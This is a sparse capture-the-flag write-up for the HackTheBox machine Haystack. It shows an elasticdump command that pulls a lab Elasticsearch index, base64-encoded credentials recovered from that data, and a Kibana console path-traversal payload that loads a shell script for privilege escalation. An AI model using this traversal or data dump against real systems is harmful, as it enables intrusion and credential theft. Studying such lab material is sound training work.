HackTheBox Writeup — Haystack

NMAP Results

elasticdump — input=http://10.10.10.115:9200 — output=data.json — type=data

This key cannot be lost, I save it here: cGFzczogc3BhbmlzaC5pcy5rZXk=
I have to save the key for the machine: dXNlcjogc2VjdXJpdHkg

Privelege Escalation

/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../…/../../../path/to/shell.js

Resources Used To Solve This Box

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Faisal Husaini

Faisal Husaini

Hacker | Red Teamer | Python Coder | Gamer | Reverse Engineering Lover